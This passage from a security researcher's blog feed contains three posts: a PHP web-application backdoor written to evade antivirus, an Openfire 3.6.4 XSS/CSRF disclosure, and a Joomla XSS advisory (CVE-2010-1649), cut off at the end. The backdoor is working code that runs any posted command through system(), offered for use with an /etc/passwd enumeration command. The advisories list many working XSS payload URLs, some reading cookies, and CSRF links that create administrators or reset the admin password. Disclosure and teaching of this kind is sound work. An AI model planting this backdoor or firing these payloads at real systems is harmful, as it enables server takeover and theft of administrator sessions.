Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here's the code:&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt;&lt;br /&gt;simple php shell PoC - karniv0re&lt;br /&gt;&amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;h2&amp;gt;System Info&amp;lt;/h2&amp;gt;&lt;br /&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";&lt;br /&gt;echo "uname -a:\t".exec ("uname -a")."\n";&lt;br /&gt;echo "id:\t\t".exec("id")."\n";&lt;br /&gt;echo "current wd:\t".exec ("pwd")."\n";&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;&amp;lt;form method="post"&amp;gt;&lt;br /&gt;&amp;lt;input type="text" name="cmd"&amp;gt;&lt;br /&gt;&amp;lt;input type="submit" value="Execute!"&amp;gt;&lt;br /&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;&amp;lt;h2&amp;gt;Command Output&amp;lt;/h2&amp;gt;&lt;br /&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;if(isset($_POST['cmd'])){&lt;br /&gt; $cmd = $_POST['cmd'];&lt;br /&gt; if (strlen($cmd)==0){&lt;br /&gt; $cmd = "true";&lt;br /&gt; }&lt;br /&gt; system($cmd);&lt;br /&gt; die;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;To get a list of users once you have uploaded and gained access to your shell, you can run:&lt;/span&gt;&lt;br /&gt;&lt;pre&gt;"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"&lt;/pre&gt;&lt;span 
style="font-family:trebuchet ms;"&gt;Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.&lt;br /&gt;&lt;br /&gt;Happy Hacking!&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-7495228330711645405?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/7495228330711645405/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2011/03/simple-php-web-application-backdoor.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7495228330711645405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7495228330711645405'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2011/03/simple-php-web-application-backdoor.html' title='Simple PHP Web Application Backdoor'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-6210810762529438975</id><published>2011-02-15T23:56:00.000-08:00</published><updated>2011-02-16T00:24:06.453-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='openfire'/><category scheme='http://www.blogger.com/atom/ns#' term='csrf'/><category scheme='http://www.blogger.com/atom/ns#' term='bid'/><category scheme='http://www.blogger.com/atom/ns#' 
term='admin'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='owasp'/><category scheme='http://www.blogger.com/atom/ns#' term='vulnerability'/><title type='text'>Multiple XSS and XSRF issues in Openfire 3.6.4</title><content type='html'>&lt;span style="font-family:trebuchet ms;"&gt;I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:&lt;br /&gt;http://www.securityfocus.com/bid/45682&lt;br /&gt;http://secunia.com/advisories/42799&lt;br /&gt;http://packetstormsecurity.org/files/author/8144/&lt;br /&gt;http://www.exploit-db.com/exploits/15918/&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The following is the condensed disclosure document for the vulnerabilities.:&lt;br /&gt;Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Project: Openfire&lt;br /&gt;Severity: High&lt;br /&gt;Versions: 3.6.4 (other versions may be affected)&lt;br /&gt;Exploit type: Multiple XSS and CSRF&lt;br /&gt;Fixes Available: None&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Timeline:&lt;br /&gt;14 October 2010:  Vendor Contacted&lt;br /&gt;15 October 2010:  Vendor Response received. Asks to verify the issues in beta.&lt;br /&gt;28 October 2010:  Informed Vendor that multiple pages are still vulnerable&lt;br /&gt;03 November 2010: Acknowledgement / Update requested&lt;br /&gt;03 November 2010: Update recevied. 
No fixes initiated.&lt;br /&gt;23 November 2010: Informed vendor disclosure date set to 1 December 2010&lt;br /&gt;22 December 2010: Update requested.&lt;br /&gt;22 December 2010: Vendor asks to release information as the vulnerabilities are already known&lt;br /&gt;23 December 2010: A different contact at the Vendor location informs that there are no updates.&lt;br /&gt;24 December 2010: Disclosure date set to 5 January 2011&lt;br /&gt;05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Product Description:&lt;br /&gt;Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.&lt;br /&gt;(Source: http://www.igniterealtime.org/projects/openfire/)&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Affected Files/Locations/Modules:&lt;br /&gt;XSS:&lt;br /&gt;login.jsp&lt;br /&gt;security-audit-viewer.jsp&lt;br /&gt;user-create.jsp&lt;br /&gt;plugins/search/advance-user-search.jsp&lt;br /&gt;user-roster-add.jsp&lt;br /&gt;user-roster.jsp&lt;br /&gt;user-lockout.jsp&lt;br /&gt;group-create.jsp&lt;br /&gt;group-edit.jsp&lt;br /&gt;group-delete.jsp&lt;br /&gt;muc-room-edit-form.jsp&lt;br /&gt;muc-room-delete.jsp&lt;br /&gt;plugins/clientcontrol/create-bookmark.jsp&lt;br /&gt;plugins/clientcontrol/spark-form.jsp&lt;br /&gt;&lt;br /&gt;CSRF:&lt;br /&gt;user-create.jsp&lt;br /&gt;user-password.jsp&lt;br /&gt;user-delete.jsp&lt;br /&gt;group-create.jsp&lt;br /&gt;group-edit.jsp&lt;br /&gt;group-delete.jsp&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;User can insert HTML or execute arbitrary 
JavaScript code within the vulnerable application. The vulnerabilities arise because input supplied through multiple request parameters throughout the application is neither validated nor encoded before being written back into the page.&lt;br /&gt;Successful exploitation of these vulnerabilities could result in, but is not limited to, compromise of the application, theft of&lt;br /&gt;cookie-based authentication credentials, arbitrary URL redirection, disclosure or modification of sensitive data and phishing attacks.&lt;br /&gt;&lt;br /&gt;Since the vulnerabilities exist in the administrative module, a successful attack could cause a complete compromise of the entire application.&lt;br /&gt;&lt;br /&gt;An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.&lt;br /&gt;----------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;Reflected XSS (the payload is carried in the request URL and echoed back in the response; a stored variant is shown separately below):&lt;br /&gt;http://target-url/login.jsp?url=&amp;amp;username=test" onfocus=javascript:window.location.assign('http://www.google.com');"&gt;&lt;br /&gt;&lt;br /&gt;http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');"&gt;&lt;br /&gt;     &lt;br /&gt;http://target-url/security-audit-viewer.jsp?range=15&amp;amp;username=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;search=Search&lt;br /&gt;&lt;br /&gt;http://target-url/user-create.jsp?username=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-create.jsp?name=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-create.jsp?email=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;http://target-url/plugins/search/advance-user-search.jsp?criteria=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br 
/&gt;http://target-url/user-roster-add.jsp?username=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-roster-add.jsp?username=user&amp;amp;jid=1&amp;amp;nickname=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;email=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;add=Add+Item&lt;br /&gt;&lt;br /&gt;http://target-url/user-roster.jsp?username=test&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-lockout.jsp?username=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;http://target-url/group-create.jsp?name=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;description=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;create=Create+Group&lt;br /&gt;&lt;br /&gt;http://target-url/group-edit.jsp?creategroupsuccess=true&amp;amp;group=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;http://target-url/group-delete.jsp?group=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br 
/&gt;http://target-url/muc-room-edit-form.jsp?save=true&amp;amp;create=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_persistentroom=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomName=23&amp;amp;mucName=conference&amp;amp;roomconfig_roomname=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomdesc=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;room_topic=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_maxusers=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_presencebroadcast=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;true&amp;amp;roomconfig_presencebroadcast2=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_presencebroadcast3=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomsecret=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomsecret2=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_whois=moderator&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_publicroom=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_canchangenick=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_registration=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;Submit=Save+Changes&lt;br /&gt;&lt;br /&gt;http://target-url/muc-room-delete.jsp?roomJID=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;create=false&lt;br /&gt;&lt;br 
/&gt;http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;url=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;users=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;groups=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;rss=off&amp;amp;createURLBookmark=Create&amp;amp;type=url&lt;br /&gt;&lt;br /&gt;http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=&amp;lt;/textarea&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;submit=Update+Spark+Versions&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Stored XSS:&lt;br /&gt;http://target-url/group-create.jsp&lt;br /&gt;http://target-url/group-summary.jsp&lt;br /&gt;Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.&lt;br /&gt;Group Name: Test&amp;lt;script&amp;gt;alert("xss")&amp;lt;/script&amp;gt;&lt;br /&gt;Description: Test&amp;lt;script&amp;gt;alert("xss")&amp;lt;/script&amp;gt;&lt;br /&gt;Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CSRF:&lt;br /&gt;These actions are triggered by plain GET requests that carry no per-request token, so a cross-origin image load from any page a logged-in administrator views is enough to fire them. For the following links, create HTML pages with image tags whose src= attribute is set to the link and ask the user to view these pages. 
If a user is logged into Openfire's admin console and the HTML pages are viewed then the respective functions are called:&lt;br /&gt;http://target-url/user-create.jsp?username=tester&amp;amp;name=Riyaz&amp;amp;email=walikarriyazad%40microland.com&amp;amp;password=test&amp;amp;passwordConfirm=test&amp;amp;isadmin=on&amp;amp;create=Create+User&lt;br /&gt;http://target-url/user-create.jsp?username=tester&amp;amp;name=Riyaz&amp;amp;email=walikarriyazad%40microland.com&amp;amp;password=test&amp;amp;passwordConfirm=test&amp;amp;isadmin=on&amp;amp;create=Create+User&gt;&lt;br /&gt;http://target-url/user-password.jsp?username=admin&amp;amp;password=secure-pass&amp;amp;passwordConfirm=secure-pass&amp;amp;update=Update+Password&lt;br /&gt;http://target-url/user-password.jsp?username=admin&amp;amp;password=secure-pass&amp;amp;passwordConfirm=secure-pass&amp;amp;update=Update+Password&gt;&lt;br /&gt;http://target-url/user-delete.jsp?username=tester&amp;amp;delete=Delete+User&lt;br /&gt;http://target-url/user-delete.jsp?username=tester&amp;amp;delete=Delete+User&gt;&lt;br /&gt;http://target-url/group-create.jsp?name=NewGroup&amp;amp;description=New+Group&amp;amp;create=Create+Group&lt;br /&gt;http://target-url/group-create.jsp?name=NewGroup&amp;amp;description=New+Group&amp;amp;create=Create+Group&gt;&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;add=Add&amp;amp;username=admin&amp;amp;addbutton=Add&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;add=Add&amp;amp;username=admin&amp;amp;addbutton=Add&gt;&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;admin=abc@example.com&amp;amp;updateMember=Update&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;admin=abc@example.com&amp;amp;updateMember=Update&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div 
class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-6210810762529438975?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/6210810762529438975/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2011/02/multiple-xss-and-xsrf-issues-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/6210810762529438975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/6210810762529438975'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2011/02/multiple-xss-and-xsrf-issues-in.html' title='Multiple XSS and XSRF issues in Openfire 3.6.4'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-8383913600538045730</id><published>2010-06-11T02:56:00.000-07:00</published><updated>2010-06-14T04:18:35.576-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='joomla'/><category scheme='http://www.blogger.com/atom/ns#' term='bid'/><category scheme='http://www.blogger.com/atom/ns#' term='admin'/><category scheme='http://www.blogger.com/atom/ns#' term='cve'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='vulnerability'/><title type='text'>Multiple Joomla! 
XSS Vulnerabilities - CVE-2010-1649</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Last month, while doing some tests on a Joomla! installation on my home computer, I came across a very glaring security issue. The Joomla! admin module has several components that are used to manage the site and its users. Several of these components have a search text box that allows users to search through the list of entities displayed. For example the search box in com_users component allows searching the list of users displayed. The issue was with the search boxes not sanitizing user input. That meant you could enter HTML text in the boxes and it would be rendered and displayed! That is exactly the cause of the world's most common web application vulnerability, Cross Site Scripting or more commonly known as XSS.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;This should help beginners understand XSS.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Cross-site_scripting"&gt;http://en.wikipedia.org/wiki/Cross-site_scripting&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Cross-site scripting (XSS) is a type of computer security vulnerability  typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. 
An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigation implemented by the site's owner.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Cross Site Scripting can be divided into 2 classes. Persistent and Non-Persistent. The following exploit examples should make things clearer:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;Examples taken from Wikipedia.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Non-persistent:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  2. Mallory observes that Bob's website contains a reflected XSS vulnerability.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. 
This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  4. Alice visits the URL provided by Mallory while logged into Bob's website.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Persistent attack:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  1. Mallory posts a message with malicious payload to a social network.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  2. When Bob reads the message, Mallory's XSS steals Bob's cookie.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  3. Mallory can now hijack Bob's session and impersonate Bob.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;All Joomla! 1.5 releases prior to 1.5.18 are vulnerable to an XSS attack in the admin module. The following are the vulnerability details and exploit code.&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;&lt;br /&gt;* Project: Joomla!&lt;br /&gt;* SubProject: All&lt;br /&gt;* Severity: High&lt;br /&gt;* Versions: 1.5.17 and all previous 1.5 releases&lt;br /&gt;* Exploit type: XSS Injection&lt;br /&gt;* Reported Date: 2010-May-13&lt;br /&gt;* Fixed Date: 2010-May-28&lt;br /&gt;* Fixed Version: Joomla! 
1.5.18&lt;br /&gt;* Update Download Link: http://www.joomla.org/download.html&lt;br /&gt;* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;&lt;br /&gt;User can execute arbitrary JavaScript code within the vulnerable application.&lt;br /&gt;&lt;br /&gt;The vulnerability arises due to the administrator core components failing to properly sanitize user-supplied input in the "search"&lt;br /&gt;variable. Successful exploitation of this vulnerability could result in, but not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.&lt;br /&gt;&lt;br /&gt;An attacker can send a link with the exploit to an administrator whose access could compromise the application. The following PoC is&lt;br /&gt;available:&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_users&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_users&amp;amp;search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_trash&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_content&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_sections&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br 
/&gt;http://joomlasite/administrator/index.php?option=com_frontpage&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_menus&amp;amp;task=view&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_messages&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_banners&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_banners&amp;amp;c=client&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_banner&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_contact&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_contact_details&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_newsfeeds&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_newsfeeds&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_poll&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br 
/&gt;http://joomlasite/administrator/index.php?option=com_weblinks&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_weblinks&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_modules&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_plugins&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;CONFIRM URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;BID: 40444 - http://www.securityfocus.com/bid/40444 &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;CVE-2010-1649: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1649 &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Secunia: 39964: http://secunia.com/advisories/39964 &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;OSVDB: 65011: http://www.osvdb.org/65011&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBxPjG6I/AAAAAAAAAV8/X_Ht8V6O3CQ/s1600/XSS-Admin-ModuleManager.PNG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 291px;" 
